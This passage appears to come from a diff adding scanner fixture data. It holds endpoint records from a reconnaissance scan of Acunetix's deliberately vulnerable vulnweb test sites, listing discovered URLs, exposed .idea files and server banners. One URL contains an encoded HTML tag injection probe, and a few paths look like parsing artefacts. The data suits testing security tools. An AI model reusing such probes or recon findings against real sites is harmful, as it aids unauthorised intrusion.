"pk": 705, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloWorld", + "content_length": 5754, + "page_title": "Service Web Service", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:00.126Z", + "response_time": 0.511298134, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 706, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?op=HelloUser", + "content_length": 5930, + "page_title": "Service Web Service", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:00.236Z", + "response_time": 0.519510509, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 707, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ads/def.html", + "content_length": 488, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:01.032Z", + "response_time": 0.342793748, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 708, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/ads/acunetix.gif", + "content_length": 3048, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:01.161Z", + "response_time": 0.351316523, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 709, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/acuservice/service.asmx?op=MD5Encode", + "content_length": 5918, + "page_title": "Service Web Service", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:01.275Z", + "response_time": 0.519578848, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 710, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/favicon.ico", + "content_length": 894, + "page_title": null, + "http_status": 200, + "content_type": "image/x-icon", + "discovered_date": "2024-11-13T02:19:01.384Z", + "response_time": 0.34826555400000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 711, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/default.aspx", + "content_length": 14066, + "page_title": "acublog news", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:01.495Z", + "response_time": 0.529667352, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 712, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/images/background.gif", + "content_length": 144, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:01.616Z", + "response_time": 0.35701059900000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 714, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/images/comment-after.gif", + "content_length": 1957, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:01.844Z", + "response_time": 0.349265493, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 715, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/images/comment-before.gif", + "content_length": 1919, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:01.967Z", + "response_time": 0.35293402700000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 716, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/images/logo_acunetix.gif", + "content_length": 2506, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:02.102Z", + "response_time": 0.35206458900000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 718, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/images/rss.gif", + "content_length": 134, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:19:02.319Z", + "response_time": 0.352716906, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 720, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/robots.txt", + "content_length": 13, + "page_title": null, + "http_status": 200, + "content_type": "text/plain", + "discovered_date": "2024-11-13T02:19:02.537Z", + "response_time": 0.178555713, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 721, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/rssFeed.aspx", + "content_length": 2118, + "page_title": "Acunetix testaspnet", + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:19:02.648Z", + "response_time": 0.34397531, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 8, + 12 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 722, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/styles.css", + "content_length": 2597, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:19:02.756Z", + "response_time": 0.35173039899999997, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 728, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 76, + "source": null, + "http_url": "http://testaspnet.vulnweb.com/login.aspx", + "content_length": 13423, + "page_title": "login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:03.429Z", + "response_time": 0.524978638, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8, + 13 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 730, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "content_length": 232, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:03.834Z", + "response_time": 0.34347747399999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 735, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/admin", + "content_length": 90, + "page_title": null, + "http_status": 308, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:11.379Z", + "response_time": 0.352322702, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 15 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 737, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "content_length": 2, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:11.593Z", + "response_time": 0.350045832, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 754, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/comment?id=011dc54012e965efaf58a4fc21785602", + "content_length": 4497, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:13.116Z", + "response_time": 0.343789245, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 801, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/contact", + "content_length": 178, + "page_title": "405 Method Not Allowed", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:32.725Z", + "response_time": 0.365649256, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 802, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/favicon.ico", + "content_length": 894, + "page_title": null, + "http_status": 200, + "content_type": "image/x-icon", + "discovered_date": "2024-11-13T02:19:32.811Z", + "response_time": 0.346006378, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 803, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "content_length": 178, + "page_title": "405 Method Not Allowed", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:32.898Z", + "response_time": 0.342408503, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 806, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/like?id=011dc54012e965efaf58a4fc21785602", + "content_length": 4526, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:33.216Z", + "response_time": 0.349275782, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 853, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/login", + "content_length": 178, + "page_title": "405 Method Not Allowed", + "http_status": 405, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:51.964Z", + "response_time": 0.35495329400000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 857, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/report?id=011dc54012e965efaf58a4fc21785602", + "content_length": 4487, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:19:53.042Z", + "response_time": 0.348393031, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 907, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/app.js", + "content_length": 1884, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:20:05.682Z", + "response_time": 0.347245002, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 908, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/controllers/controllers.js", + "content_length": 2582, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:20:05.787Z", + "response_time": 0.351514726, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 909, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js", + "content_length": 8869, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:20:05.888Z", + "response_time": 0.346908502, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 914, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "content_length": 153, + "page_title": "403 Forbidden", + "http_status": 403, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:06.707Z", + "response_time": 0.351376885, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 917, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/comment", + "content_length": 4472, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:07.685Z", + "response_time": 0.343023527, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 919, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/like", + "content_length": 4501, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:08.303Z", + "response_time": 0.364512089, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 920, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/logout", + "content_length": 265, + "page_title": "Redirecting...", + "http_status": 302, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:08.420Z", + "response_time": 0.347717589, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 921, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/report", + "content_length": 4462, + "page_title": "SecurityTweets", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:08.767Z", + "response_time": 0.346222484, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 11 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 924, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/samples", + "content_length": 386, + "page_title": "Python samples", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:09.093Z", + "response_time": 0.358650164, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 925, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "content_length": 555, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:09.448Z", + "response_time": 0.355369532, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 926, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "content_length": 153, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:09.547Z", + "response_time": 0.353998673, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 927, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/post.js", + "content_length": 3319, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:20:09.646Z", + "response_time": 0.34903368, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 928, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/services/itemsService.js", + "content_length": 723, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:20:09.822Z", + "response_time": 0.352466487, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 929, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/css/?%3Cmy_tag_88fc8f0ec9141866cb14f3125be901b4/%3E", + "content_length": 153, + "page_title": "403 Forbidden", + "http_status": 403, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:09.920Z", + "response_time": 0.342610728, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 931, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/css/style.css", + "content_length": 570, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:20:10.134Z", + "response_time": 0.343273863, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 933, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/about.html", + "content_length": 2211, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:12.553Z", + "response_time": 0.352325217, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 934, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/archive.html", + "content_length": 1175, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:12.644Z", + "response_time": 0.35199581799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 935, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/carousel.html", + "content_length": 937, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:12.735Z", + "response_time": 0.352954832, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 936, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/itemsList.html", + "content_length": 2713, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:13.555Z", + "response_time": 0.34857161999999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 937, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/latest.html", + "content_length": 154, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:13.693Z", + "response_time": 0.352437632, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 938, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/popular.html", + "content_length": 169, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:13.793Z", + "response_time": 0.351435962, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 939, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/app/partials/redir.html", + "content_length": 389, + "page_title": "Loading ...", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:13.891Z", + "response_time": 0.346728684, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 940, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/img/ajax-loader.gif", + "content_length": 847, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:20:14.344Z", + "response_time": 0.33987914599999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 941, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/img/logo2.png", + "content_length": 2736, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:20:14.453Z", + "response_time": 0.343451244, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 944, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 82, + "source": null, + "http_url": "http://testhtml5.vulnweb.com/static/scr/default.png", + "content_length": 6934, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:20:14.774Z", + "response_time": 0.35622488199999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 948, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/˓→listproducts.php", + "content_length": 16, + "page_title": null, + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:19.177Z", + "response_time": 0.350935605, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 961, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea", + "content_length": 951, + "page_title": "301 Moved Permanently", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:20:24.120Z", + "response_time": 0.194014504, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 962, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "content_length": 6, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:20:24.221Z", + "response_time": 0.353531438, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 963, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/acuart.iml", + "content_length": 292, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:20:24.321Z", + "response_time": 0.351629186, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 965, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/encodings.xml", + "content_length": 171, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:24.521Z", + "response_time": 0.191455042, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 966, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/misc.xml", + "content_length": 266, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:24.621Z", + "response_time": 0.191181603, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 967, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/.idea/modules.xml", + "content_length": 275, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:20:24.718Z", + "response_time": 0.185743721, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + 